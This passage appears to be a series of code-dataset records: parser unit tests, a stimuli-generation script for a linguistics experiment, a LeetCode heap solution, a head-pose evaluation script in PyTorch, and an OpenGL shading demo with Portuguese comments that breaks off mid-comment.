[const.ID_IMAGE, [\"Caption\", \\\n \"/home/shahzeb/sketchbook/texless/example/example_image.jpg\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_image(), res1)\n\n with self.assertRaises(SystemExit):\n tst2 = [img+\" Caption \"+\".\"+\" ../example/example_image.jpg\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.parser._make_image()\n\n tst3 = [img+\" Caption \"+\".\"+\" example_image.jpg\"]\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._make_image()\n\n def test_make_table(self):\n tbl = self.delims[const.ID_TABLE]\n sep = self.delims[const.ID_SEPR]\n\n tst1 = [tbl+\"2\"+sep+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\\n\"]\n res1 = [const.ID_TABLE, [\"Caption\", [ \\\n [\"(0,0)\", \"(0,1)\"], \\\n [\"(1,0)\", \"(1,1)\"]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_table(), res1)\n\n with self.assertRaises(SystemExit):\n tst2 = [tbl+\"2\"+\".\"+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.parser._make_table()\n\n tst3 = [tbl+\"2\"+sep+\"Caption\\n\", \\\n \"(0,0)\"+sep+\"(0,1)\\n\", \\\n \"(1,0)\"+sep+\"(1,1)\"+sep+\"(1,2)\\n\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst3\n self.parser._make_table()\n\n def test_make_raw_tex(self):\n rstr, rend = self.delims[const.ID_T_BLK]\n\n tsts = [rstr+\"This has a {\\\\bf bold} line\"+rend, \\\n rstr+\"This has !x=y! some math.\"+rend, \\\n rstr+\"Test with nothing in it.\"+rend]\n ress = [[const.ID_T_BLK, [\"This has a {\\\\bf bold} line\"]], \\\n [const.ID_T_BLK, [\"This has !x=y! some math.\"]], \\\n [const.ID_T_BLK, [\"Test with nothing in it.\"]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_raw_tex(), ress[0])\n self.assertEqual(self.parser._make_raw_tex(), ress[1])\n self.assertEqual(self.parser._make_raw_tex(), ress[2])\n\n def test_make_paragraph(self):\n udlm = self.delims[const.ID_LIST_UNO]\n\n tst1 = [\"Just some lines.\\n\", \\\n \"To test our paragraphs.\\n\", \\\n \"Now done.\\n\"]\n res1 = [const.ID_PARA, [ \\\n \"Just some lines.\", \\\n \"To test our paragraphs.\", \\\n \"Now done.\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_paragraph(), res1)\n\n tst2 = [\"Introduction to a list:\\n\", \\\n udlm+\"Item one.\\n\", \\\n udlm+\"Item two.\\n\", \\\n \"\\n\"]\n res2 = [const.ID_PARA, [ \\\n \"Introduction to a list:\", \\\n [const.ID_LIST, [const.ID_LIST_UNO, [ \\\n \"Item one.\", \"Item two.\"]]]]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst2\n self.assertEqual(self.parser._make_paragraph(), res2)\n\n\n def test_make_math(self):\n mstr, mend = self.delims[const.ID_M_BLK]\n\n tsts = [mstr+\"\\\\sum\"+mend+'\\n', \\\n mstr+\"x = y = z + 4\"+mend+'\\n', \\\n mstr+\"\\\\frac{1}{x}\"+mend+'\\n']\n ress = [\"\\\\sum\", \\\n \"x = y = z + 4\", \\\n \"\\\\frac{1}{x}\"]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tsts\n\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[0]]])\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[1]]])\n self.assertEqual(self.parser._make_math(), [const.ID_M_BLK, [ress[2]]])\n\n def test_make_comment(self):\n cstr, cend = self.delims[const.ID_CMT]\n\n tst1 = [cstr+\"Comment one.\\n\", \\\n \"Comment two.\"+cend+\"\\n\", \\\n \"Extra line.\"]\n res1 = [const.ID_CMT, [ \\\n \"Comment one.\", \"Comment two.\"]]\n\n self.parser.raw_idx = 0\n self.parser.raw_text = tst1\n self.assertEqual(self.parser._make_comment(), res1)\n\nclass TestTexGenerator(unittest.TestCase):\n \"\"\"\n TexGenerator is the class that will take the\n output from NotParse, which has data attached\n to labels, and place the correct output in the\n correct place.\n\n We will not test most of it because the\n easiest way to test this class is to just\n try to compile the output with pdflatex.\n\n We will just test the header to confirm our\n settings are being handled correctly.\n\n \"\"\"\n\n def setUp(self):\n fake_flags = collections.namedtuple('Fake_Flags', ['m', 'w'])\n fake_flags.m = False\n\n self.gen = texgenerator.TexGenerator(\"blah\", fake_flags, \\\n [], test_mode=True)\n\n for key, val in self.gen.tex_repl.items():\n if isinstance(val, tuple):\n self.gen.tex_repl[key] = tuple('~'*len(val))\n else:\n self.gen.tex_repl[key] = '~'\n\n def test_make_header(self):\n tst1 = [(const.ID_HDR_TIT, \"Title\"), \\\n (const.ID_HDR_DAT, \"August\")]\n res1 = \"~~~~Title~~August~~\"\n\n self.gen.parsed = [tst1]\n self.assertEqual(self.gen._make_header(), res1)\n\n def test_custom_setup(self):\n cust_setup = \"This is pretend tex setup\"\n tst1 = [(const.ID_HDR_TIT, \"Title\"), \\\n (const.ID_HDR_PAM, cust_setup)]\n res1 = \"This is pretend tex setup\"\n\n self.gen.parsed = [tst1]\n self.gen._make_header()\n\n self.assertEqual(self.gen._make_header(), res1)\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"src/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":23697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"89496880","text":"\nnonce_file = \"./pilot-nonce-roots.txt\"\nnoun_file = \"./pilot-noun-contexts.txt\"\nverb_file = \"./pilot-verb-contexts.txt\"\nadjective_file = \"./pilot-adjective-contexts.txt\"\nstimuli_file = \"./pilot-nonce-stimuli.txt\"\n\ndef read_file(file_name):\n category = file_name.split(\"-\")[1]\n items = []\n with open(file_name) as f:\n for line in f.readlines():\n l = line.strip()\n if len(l) >= 1:\n items.append((category,l))\n return items\n\ndef create_stimuli(roots, contexts):\n stimuli = []\n for i, (item,root) in enumerate(roots):\n condition = i + 1\n for category,context in contexts:\n root_mod = root\n if category != \"noun\" and root[-1] == \"e\":\n root_mod = root[:-1]\n prompt = context.replace(\"XXX\", root)\n prompt = prompt.replace(\"YYY\", str(root_mod+\"[BLANK1]\"), 1).replace(\"YYY\", str(root_mod+\"[BLANK1]\"), 1)\n stimulus = \"{condition: \\\"\" + str(condition) + \"\\\", item: \\\"\" + item + \"\\\", category: \\\"\" + category + \"\\\", context: \\\"\" + context + \"\\\", root: \\\"\" + root + \"\\\", prompt: \\\"\" + prompt + \"\\\"}\"\n stimuli.append(stimulus)\n condition = (condition + 1) % 30\n return stimuli\n\n\n### MAIN ###\nroots = read_file(nonce_file)\ncontexts = read_file(noun_file) + read_file(verb_file) + read_file(adjective_file)\nstimuli = create_stimuli(roots, contexts)\n\nwith open(stimuli_file, \"w\") as f:\n for stimulus in stimuli:\n f.write(stimulus)\n f.write(\",\\n\")\n","sub_path":"human_generalization/experiments/03_experiment/stimuli/experiment3-make_stimuli.py","file_name":"experiment3-make_stimuli.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"629626683","text":"'''\nYou are given a 0-indexed integer array costs where costs[i] is the cost of hiring the ith worker.\n\nYou are also given two integers k and candidates. We want to hire exactly k workers according to the following rules:\n\nYou will run k sessions and hire exactly one worker in each session.\nIn each hiring session, choose the worker with the lowest cost from either the first candidates workers or the last candidates workers. Break the tie by the smallest index.\nFor example, if costs = [3,2,7,7,1,2] and candidates = 2, then in the first hiring session, we will choose the 4th worker because they have the lowest cost [3,2,7,7,1,2].\nIn the second hiring session, we will choose 1st worker because they have the same lowest cost as 4th worker but they have the smallest index [3,2,7,7,2]. Please note that the indexing may be changed in the process.\nIf there are fewer than candidates workers remaining, choose the worker with the lowest cost among them. Break the tie by the smallest index.\nA worker can only be chosen once.\nReturn the total cost to hire exactly k workers.\n\n\n\nExample 1:\n\nInput: costs = [17,12,10,2,7,2,11,20,8], k = 3, candidates = 4\nOutput: 11\nExplanation: We hire 3 workers in total. The total cost is initially 0.\n- In the first hiring round we choose the worker from [17,12,10,2,7,2,11,20,8]. The lowest cost is 2, and we break the tie by the smallest index, which is 3. The total cost = 0 + 2 = 2.\n- In the second hiring round we choose the worker from [17,12,10,7,2,11,20,8]. The lowest cost is 2 (index 4). The total cost = 2 + 2 = 4.\n- In the third hiring round we choose the worker from [17,12,10,7,11,20,8]. The lowest cost is 7 (index 3). The total cost = 4 + 7 = 11. Notice that the worker with index 3 was common in the first and last four workers.\nThe total hiring cost is 11.\nExample 2:\n\nInput: costs = [1,2,4,1], k = 3, candidates = 3\nOutput: 4\nExplanation: We hire 3 workers in total. The total cost is initially 0.\n- In the first hiring round we choose the worker from [1,2,4,1]. The lowest cost is 1, and we break the tie by the smallest index, which is 0. The total cost = 0 + 1 = 1. Notice that workers with index 1 and 2 are common in the first and last 3 workers.\n- In the second hiring round we choose the worker from [2,4,1]. The lowest cost is 1 (index 2). The total cost = 1 + 1 = 2.\n- In the third hiring round there are less than three candidates. We choose the worker from the remaining workers [2,4]. The lowest cost is 2 (index 0). The total cost = 2 + 2 = 4.\nThe total hiring cost is 4.\n\n\nConstraints:\n\n1 <= costs.length <= 105\n1 <= costs[i] <= 105\n1 <= k, candidates <= costs.length\n'''\nimport unittest\n\nfrom typing import *\nfrom heapq import heappush, heappop, heapify\n\nclass Solution:\n def totalCost(self, costs: List[int], k: int, candidates: int) -> int:\n left_heap = costs[:candidates]\n right_heap = costs[max(len(costs) - candidates, candidates):]\n res = 0\n heapify(left_heap)\n heapify(right_heap)\n\n start = candidates\n end = max(len(costs) - candidates, candidates) - 1\n for _ in range(k):\n if left_heap and right_heap:\n if left_heap[0] <= right_heap[0]:\n res += heappop(left_heap)\n if start <= end:\n heappush(left_heap, costs[start])\n start += 1\n else:\n res += heappop(right_heap)\n if start <= end:\n heappush(right_heap, costs[end])\n end -= 1\n elif not left_heap and not right_heap:\n break\n elif not left_heap:\n res += heappop(right_heap)\n if start <= end:\n heappush(right_heap, costs[end])\n end -= 1\n else:\n res += heappop(left_heap)\n if start <= end:\n heappush(left_heap, costs[start])\n start += 1\n return res\n\n\nclass TestSolution(unittest.TestCase):\n\n def test_case(self):\n examples = (\n (([17,12,10,2,7,2,11,20,8], 3, 4), 11),\n (([1,2,4,1], 3, 3), 4),\n )\n for first, second in examples:\n self.assert_function(first, second)\n\n def assert_function(self, first, second):\n self.assertEqual(Solution().totalCost(*first), second,\n msg=\"first: {}; second: {}\".format(first, second))\n\n\nunittest.main()\n","sub_path":"Leetcode/2462. Total Cost to Hire K Workers.py","file_name":"2462. Total Cost to Hire K Workers.py","file_ext":"py","file_size_in_byte":4511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"401722014","text":"import sys, os, argparse\n\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\n\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torchvision\nimport torch.backends.cudnn as cudnn\nimport torch.nn.functional as F\n\nimport datasets, posenet, utils\n\ndef parse_args():\n \"\"\"Parse input arguments.\"\"\"\n parser = argparse.ArgumentParser(description='Head pose estimation using the Hopenet network.')\n parser.add_argument('--gpu', dest='gpu_id', help='GPU device id to use [0]',\n default=0, type=int)\n parser.add_argument('--data_dir', dest='data_dir', help='Directory path for data.',\n default='', type=str)\n parser.add_argument('--filename_list', dest='filename_list', help='Path to text file containing relative paths for every example.',\n default='', type=str)\n parser.add_argument('--snapshot', dest='snapshot', help='Name of model snapshot.',\n default='', type=str)\n parser.add_argument('--save_viz', dest='save_viz', help='Save images with pose cube.',\n default=False, type=bool)\n parser.add_argument('--dataset', dest='dataset', help='Dataset type.', default='AFLW2000', type=str)\n parser.add_argument('--max_angle', dest='max_angle', help='Max angle.',\n default=99, type=int)\n parser.add_argument('--bin_angle', dest='bin_angle', help='Bin angle.',\n default=3, type=int)\n\n args = parser.parse_args()\n\n return args\n\nif __name__ == '__main__':\n args = parse_args()\n\n cudnn.enabled = True\n gpu = args.gpu_id\n snapshot_path = args.snapshot\n\n max_angle = args.max_angle\n angles_per_bin = args.bin_angle\n bins = (max_angle * 2) // angles_per_bin\n\n # ResNet50 structure\n model = posenet.PoseNet(angles_per_bin, max_angle)\n\n print('Loading snapshot.')\n # Load snapshot\n saved_state_dict = torch.load(snapshot_path)\n model.load_state_dict(saved_state_dict)\n\n print('Loading data.')\n\n transformations = transforms.Compose([transforms.Scale(224),\n transforms.CenterCrop(224), transforms.ToTensor(),\n transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])])\n\n data_dir = os.path.join('Data\\\\RAW', args.data_dir)\n\n if args.dataset == 'Pose_300W_LP_Training':\n pose_dataset = datasets.Pose_300W_LP_Training(data_dir, args.filename_list, transformations)\n elif args.dataset == 'AFLW2000':\n pose_dataset = datasets.AFLW2000(data_dir, args.filename_list, transformations)\n else:\n print('Error: not a valid dataset name')\n sys.exit()\n test_loader = torch.utils.data.DataLoader(dataset=pose_dataset,\n batch_size=1,\n num_workers=2)\n\n model.cuda(gpu)\n\n print('Ready to test network.')\n\n # Test the Model\n model.eval() # Change model to 'eval' mode (BN uses moving mean/var).\n total = 0\n\n idx_tensor = range(bins)\n idx_tensor = torch.FloatTensor(idx_tensor).cuda(gpu)\n\n yaw_error = .0\n pitch_error = .0\n roll_error = .0\n\n for i, (images, labels, cont_labels, name) in enumerate(test_loader):\n images = Variable(images).cuda(gpu)\n total += cont_labels.size(0)\n\n label_yaw = cont_labels[:,0].float()\n label_pitch = cont_labels[:,1].float()\n label_roll = cont_labels[:,2].float()\n\n yaw, pitch, roll = model(images)\n\n # Continuous predictions\n yaw_predicted = utils.softmax_temperature(yaw.data, 1)\n pitch_predicted = utils.softmax_temperature(pitch.data, 1)\n roll_predicted = utils.softmax_temperature(roll.data, 1)\n\n yaw_predicted = torch.sum(yaw_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n pitch_predicted = torch.sum(pitch_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n roll_predicted = torch.sum(roll_predicted * idx_tensor, 1).cpu() * angles_per_bin - max_angle\n\n # Mean absolute error\n yaw_error += torch.sum(torch.abs(yaw_predicted - label_yaw))\n pitch_error += torch.sum(torch.abs(pitch_predicted - label_pitch))\n roll_error += torch.sum(torch.abs(roll_predicted - label_roll))\n\n # Save first image in batch with pose cube or axis.\n if args.save_viz:\n name = name[0]\n if args.dataset == 'BIWI':\n cv2_img = cv2.imread(os.path.join(data_dir, name + '_rgb.png'))\n else:\n cv2_img = cv2.imread(os.path.join(data_dir, name + '.jpg'))\n\n predicted = 'y %.2f, p %.2f, r %.2f' % (yaw_predicted.item(), pitch_predicted.item(), roll_predicted.item())\n actual = 'y %.2f, p %.2f, r %.2f' % (label_yaw.item(), label_pitch.item(), label_roll.item())\n error_string = 'y %.2f, p %.2f, r %.2f' % (torch.sum(torch.abs(yaw_predicted - label_yaw)), torch.sum(torch.abs(pitch_predicted - label_pitch)), torch.sum(torch.abs(roll_predicted - label_roll)))\n cv2.putText(cv2_img, predicted, (30, cv2_img.shape[0] - 90), fontFace=1, fontScale=1, color=(0,255,0), thickness=2)\n cv2.putText(cv2_img, actual, (30, cv2_img.shape[0] - 60), fontFace=1, fontScale=1, color=(0,255,255), thickness=2)\n cv2.putText(cv2_img, error_string, (30, cv2_img.shape[0] - 30), fontFace=1, fontScale=1, color=(0,0,255), thickness=2)\n\n utils.draw_axis_rads(cv2_img, *np.radians([yaw_predicted[0], pitch_predicted[0], roll_predicted[0]]))\n\n utils.draw_axis_rads(cv2_img, *np.radians([label_yaw[0], label_pitch[0], label_roll[0]]), cx=(255,255,0), cy=(255,0,255), cz=(0, 255, 255))\n\n cv2.imwrite(os.path.join('output\\\\images', name + '.jpg'), cv2_img)\n\n print('Test error in degrees of the model on the ' + str(total) +\n ' test images. Yaw: %.4f, Pitch: %.4f, Roll: %.4f, MAE: %.4f' % (yaw_error / total,\n pitch_error / total, roll_error / total, (yaw_error + pitch_error + roll_error) / (3.0 * total)))\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":6027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"648988846","text":"#%%\n'''\n Nesta cela ocorre a chamada das dependências. Se o GLFW3 não estiver instalado no sistema, será lançada uma exceção\n aqui.\n'''\n\nfrom OpenGL.GL import *\nfrom OpenGL.GL import shaders\nfrom OpenGL.GLU import *\nimport pyrr\nimport glfw\nimport numpy\n\n\n#%%\n'''\n As shaders são onde ocorre a maior parte da operação de iluminação, portanto elas serão descritas com detalhe nesta\n cela.\n \n A vertex shader recebe como input a posição do vértice em coordenadas do modelo e um parâmetro \"opcional\", as\n normais do vértice (isso ocorre porque as funções gluSphere() e gluCylinder() não passam normais de vértice como\n input para shaders e o Teapot passa, mas isso será explicado com mais detalhes depois). Por default, o parâmetro \n vertex_normal foi declarado como (0.0, 0.0, 0.0) no código, no caso da esfera e do cilindro, para que ele seja\n calculado na própria shader.\n \n A shader também recebe como uniform a matriz modelo, matriz da câmera e matriz de projeção perspectiva, além da\n posição da câmera (importante para o cálculo da luz especular), as três cores do albedo e a constante especular\n (importantes para o cálculo da cor do vértice, usada no sombreamento de Gouraud). As saídas para a fragment shader\n são a posição do pixel no espaço do modelo e no espaço de visualização, a cor do vértice, a posição da câmera, a \n normal, uma fonte de luz declarada na própria shader e um vetor de luz ambiente, que é uma função da cor do\n material. Posições e normais são automaticamente interpoladas entre as shaders.\n \n O cálculo da normal, se necessário, é feito a partir do valor da posição do vértice no espaço do modelo. Isso ocorre\n porque em uma esfera, a normal é apenas o ponto menos o centro da esfera (no caso, estamos falando de coordenadas\n do modelo, então este centro é (0.0, 0.0, 0.0)). A mesma operação pode ser feita para o cilindro. Caso contrário, \n será usada a normal do vértice que foi recebida como input.\n \n A seguir, é calculado a cor de cada vértice, de acordo com o modelo de iluminação de Phong, mais a luz ambiente. O\n resultado é passado adiante para a fragment shader.\n'''\n\n# shaders\nvertex_shader = '''\n#version 330\nuniform mat4 model_transform;\nuniform mat4 camera;\nuniform mat4 projection;\nuniform vec3 camera_pos_input;\n\nuniform float albedo_r;\nuniform float albedo_g;\nuniform float albedo_b;\nuniform float ks;\n\nin vec3 position;\nin vec3 vertex_normal;\n\nout vec3 view_position;\nout vec3 pixel_position;\nout vec3 vertex_color;\nout vec3 camera_position;\nout vec3 normal;\nout vec3 light_source;\nout vec4 ambient_light;\n\nvoid main()\n{\n gl_Position = projection * camera * model_transform * vec4(position, 1.0);\n view_position = gl_Position.xyz;\n pixel_position = position;\n camera_position = camera_pos_input;\n if(vertex_normal == vec3(0.0, 0.0, 0.0))\n {\n normal = normalize(position);\n }\n else\n {\n normal = normalize(vertex_normal);\n }\n \n light_source = vec3(5.0, 20.0, 10.0);\n float diffuse_red = albedo_r / 3.14 * dot(normal, light_source);\n float diffuse_green = albedo_g / 3.14 * dot(normal, light_source);\n float diffuse_blue = albedo_b / 3.14 * dot(normal, light_source);\n ambient_light = vec4(albedo_r/3.14, albedo_g/3.14, albedo_b/3.14, 0.0);\n\n vec3 reflection_vec = 2.0 * dot(light_source, normal) * normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n diffuse_red = max(0.0, diffuse_red);\n diffuse_green = max(0.0, diffuse_green);\n diffuse_blue = max(0.0, diffuse_blue);\n \n vertex_color = vec3(diffuse_red + specular, diffuse_green + specular, diffuse_blue + specular) + ambient_light.rgb;\n}\n'''\n\n'''\n Fragment shader: é aqui que ocorre o output da cor do pixel. No caso, ela recebe como inputs os outputs da vertex\n shader, e como uniforms os mesmos parâmetros para calcular a cor de acordo com o modelo de iluminação de Phong, mais\n um inteiro shading_type, que determina o tipo de sombreamento que será feito: 0 = flat, 1 = Gouraud e 2 = Phong.\n \n No caso do flat shading, a normal da face é calculada como o produto vetorial entre as derivadas discretas em função \n de x e y da posição do pixel. No Phong shading, o mesmo cálculo é feito, mas com a normal interpolada que a shader\n recebeu como input. No caso do Gouraud shading, a cor dos vértices (que foi interpolada de uma shader para outra)\n simplesmente é usada.\n'''\n\nfragment_shader = '''\n#version 330\nuniform float albedo_r;\nuniform float albedo_g;\nuniform float albedo_b;\nuniform float ks;\nuniform int shading_type;\n\nin vec3 view_position;\nin vec3 pixel_position;\nin vec3 vertex_color;\nin vec3 camera_position;\nin vec3 normal;\nin vec3 light_source;\nin vec4 ambient_light;\n\nout vec4 frag_color;\n\nvoid main()\n{ \n if(shading_type == 0) //flat\n {\n vec3 x_tangent = dFdx(pixel_position);\n vec3 y_tangent = dFdy(pixel_position);\n vec3 face_normal = normalize(cross(x_tangent, y_tangent));\n \n float red_diffuse = albedo_r / 3.14 * dot(face_normal, light_source);\n float green_diffuse = albedo_g / 3.14 * dot(face_normal, light_source);\n float blue_diffuse = albedo_b / 3.14 * dot(face_normal, light_source);\n \n vec3 reflection_vec = 2.0 * dot(light_source, face_normal) * face_normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n red_diffuse = max(0.0, red_diffuse);\n green_diffuse = max(0.0, green_diffuse);\n blue_diffuse = max(0.0, blue_diffuse);\n \n frag_color = vec4(red_diffuse + specular, green_diffuse + specular, blue_diffuse + specular, 1.0) + ambient_light;\n }\n else if(shading_type == 1) // gouraud\n {\n frag_color = vec4(vertex_color, 1.0);\n }\n else // phong\n {\n vec3 interpolated_normal = normalize(normal);\n \n float red_diffuse = albedo_r / 3.14 * dot(interpolated_normal, light_source);\n float green_diffuse = albedo_g / 3.14 * dot(interpolated_normal, light_source);\n float blue_diffuse = albedo_b / 3.14 * dot(interpolated_normal, light_source);\n \n vec3 reflection_vec = 2.0 * dot(light_source, interpolated_normal) * interpolated_normal - light_source;\n float specular = ks * dot(reflection_vec, normalize(camera_position));\n \n specular = max(0.0, specular);\n red_diffuse = max(0.0, red_diffuse);\n green_diffuse = max(0.0, green_diffuse);\n blue_diffuse = max(0.0, blue_diffuse);\n \n frag_color = vec4(red_diffuse + specular, green_diffuse + specular, blue_diffuse + specular, 1.0) + ambient_light;\n }\n}\n'''\n\n\n#%%\n'''\n A chaleira foi obtida em [https://graphics.stanford.edu/courses/cs148-10-summer/as3/code/as3/teapot.obj]. O modelo\n contém os vértices e os índices das faces, apenas. Isso faz com que seja necessário calcular as normais de cada\n vértice na CPU para depois passar para a shader (isso seria possível na GPU se OpenGL 3.3 tivesse suporte para\n tesselation shaders, mas decidiu-se optar pela versão 3.3 por questões de compatibilidade).\n \n Em primeiro lugar, o arquivo Wavefront é lido e os valores dos vértices e das faces são guardados em arrays\n bidimensionais do numpy. A biblioteca pyrr tem uma função especial para gerar normais de vértice a partir destes\n valores. Depois que isso é feito, os arrays são transformados em unidimensionais.\n \n Feito isso, os buffers para os três componentes do objeto são criados na GPU para uma melhor performance. Ao serem\n renderizados, eles são chamados por glBindBuffer e passam cada um dos seus input para a shader, antes de ser\n chamada a função glDrawElements(), que pode desenhar os triângulos a partir dos índices de faces.\n'''\n\nclass Teapot():\n def __init__(self):\n vertices = []\n faces = []\n # obj loader super simples\n with open('teapot.obj', 'r') as obj: # le os vertices e faces do OBJ\n for line in obj.readlines():\n line = line.split(' ')\n if line[0] == 'v':\n vertices.append([float(line[1])/3, float(line[2])/3, float(line[3])/3])\n elif line[0] == 'f':\n faces.append([int(line[1])-1, int(line[2])-1, int(line[3])-1])\n \n # calculate vertex normals\n self.vertices = numpy.array(vertices, dtype=numpy.float32)\n self.faces = numpy.array(faces, dtype=numpy.uint32)\n vertex_normals = pyrr.vector3.generate_vertex_normals(self.vertices, self.faces)\n self.vertex_normals = numpy.array(vertex_normals, dtype=numpy.float32).flatten()\n self.vertices = numpy.array(vertices, dtype=numpy.float32).flatten()\n self.faces = numpy.array(faces, dtype=numpy.uint32).flatten()\n\n self.vbo = glGenBuffers(1)\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n glBufferData(GL_ARRAY_BUFFER, len(self.vertices) * 4, self.vertices, GL_STATIC_DRAW)\n self.ebo = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ebo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(self.faces) * 4, self.faces, GL_STATIC_DRAW)\n self.nbo = glGenBuffers(1)\n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.nbo)\n glBufferData(GL_ELEMENT_ARRAY_BUFFER, len(self.vertex_normals) * 4, self.vertex_normals, GL_STATIC_DRAW)\n\n print(self.vbo, self.ebo, self.nbo)\n \n def render(self, shader):\n glBindBuffer(GL_ARRAY_BUFFER, self.vbo)\n position = glGetAttribLocation(shader, 'position')\n glVertexAttribPointer(position, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n glEnableVertexAttribArray(position)\n \n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.nbo)\n vertex_normal = glGetAttribLocation(shader, 'vertex_normal')\n glVertexAttribPointer(vertex_normal, 3, GL_FLOAT, GL_FALSE, 0, ctypes.c_void_p(0))\n glEnableVertexAttribArray(vertex_normal)\n \n glBindBuffer(GL_ELEMENT_ARRAY_BUFFER, self.ebo)\n glDrawElements(GL_TRIANGLES, len(self.faces), GL_UNSIGNED_INT, None)\n\n\n#%%\n'''\n O material de Phong é definido pelo tipo de shading, a sua cor e a constante especular. Isso pode ser modelado\n facilmente e passado como parâmetro para a shader em tempo real como uniform, como ocorre nesta classe.\n'''\n\n# material\nclass PhongMaterial:\n def __init__(self, shader, shading_type, albedo_r, albedo_g, albedo_b, specular_constant):\n self.shader = shader\n self.shading_type = shading_type\n self.albedo = [albedo_r, albedo_g, albedo_b]\n self.specular_constant = specular_constant\n def set_up_rendering(self):\n glUseProgram(self.shader)\n \n #lighting uniforms\n r = glGetUniformLocation(self.shader, 'albedo_r')\n g = glGetUniformLocation(self.shader, 'albedo_g')\n b = glGetUniformLocation(self.shader, 'albedo_b')\n glUniform1f(r, self.albedo[0])\n glUniform1f(g, self.albedo[1])\n glUniform1f(b, self.albedo[2])\n \n ks = glGetUniformLocation(self.shader, 'ks')\n glUniform1f(ks, self.specular_constant)\n \n st = glGetUniformLocation(self.shader, 'shading_type')\n if self.shading_type == 'gouraud':\n glUniform1i(st, 1)\n elif self.shading_type == 'phong':\n glUniform1i(st, 2)\n else:\n glUniform1i(st, 0)\n\n\n#%%\n'''\n A classe Shape contém um material do tipo PhongMaterial e um tipo de forma, que é um inteiro entre zero e 2. A\n função set_up_rendering() do material é chamada a cada frame porque é nela que são passados os uniforms de ilumi-\n nação da shader.\n \n No método render(), são calculadas as matrizes de transformação que serão passadas como uniforms para as shaders.\n Em seguida, é avaliado qual dos tipos de forma está sendo renderizado. Caso seja um cilindro ou uma esfera, as \n normais são transferidas ao valor default antes mencionado, por uma função glVertexAttrib3f(). Quando chamamos a\n função glDisableVertexAttribArray(loc), a última chamada de glVertexAttrib3f() em 'loc' será o valor transferido\n para a shader. Isso não é necessário caso a forma seja uma chaleira, onde as normais terão sido computadas na CPU\n com antecedência.\n'''\n\nclass Shape:\n def __init__(self, shape_type, material):\n self.material = material\n self.shape_type = shape_type\n self.teapot = Teapot()\n def render(self):\n self.material.set_up_rendering()\n \n #transformation uniforms\n model_transform = pyrr.Matrix44.identity()\n perspective_transform = pyrr.Matrix44.perspective_projection(45, 4/3, 0.01, 100)\n camera_transform = pyrr.Matrix44.look_at((2, 2, 2), (0, 0, 0), (0, 1, 0))\n \n mt_loc = glGetUniformLocation(self.material.shader, 'model_transform')\n glUniformMatrix4fv(mt_loc, 1, GL_FALSE, model_transform)\n pr_loc = glGetUniformLocation(self.material.shader, 'projection')\n glUniformMatrix4fv(pr_loc, 1, GL_FALSE, perspective_transform)\n cam_loc = glGetUniformLocation(self.material.shader, 'camera')\n glUniformMatrix4fv(cam_loc, 1, GL_FALSE, camera_transform)\n cam_pos_loc = glGetUniformLocation(self.material.shader, 'camera_pos_input')\n glUniform3f(cam_pos_loc, 2, 2, 2)\n \n qobj = gluNewQuadric()\n gluQuadricNormals(qobj, GLU_SMOOTH)\n gluQuadricOrientation(qobj, GLU_OUTSIDE)\n if self.shape_type == 'sphere':\n vn = glGetAttribLocation(self.material.shader, 'vertex_normal')\n glVertexAttrib3f(vn, 0.0, 0.0, 0.0)\n glDisableVertexAttribArray(vn)\n gluSphere(qobj, 1, 50, 50)\n elif self.shape_type == 'cylinder':\n vn = glGetAttribLocation(self.material.shader, 'vertex_normal')\n glVertexAttrib3f(vn, 0.0, 0.0, 0.0)\n glDisableVertexAttribArray(vn)\n gluCylinder(qobj, 1, 1, 1, 50, 50)\n else:\n self.teapot.render(self.material.shader)\n\n\n#%%\n'''\n Nesta cela são definidos os inputs para controlar o programa. São definidos da seguinte forma:\n ← e → aumentam ou diminuem um valor, que será, dependendo da outra tecla que estiver pressionada:\n cor vermelha, caso seja R\n cor verde para a tecla G\n cor azul caso seja B\n constante de especularidade, no caso de S\n A tecla enter muda o tipo de shading 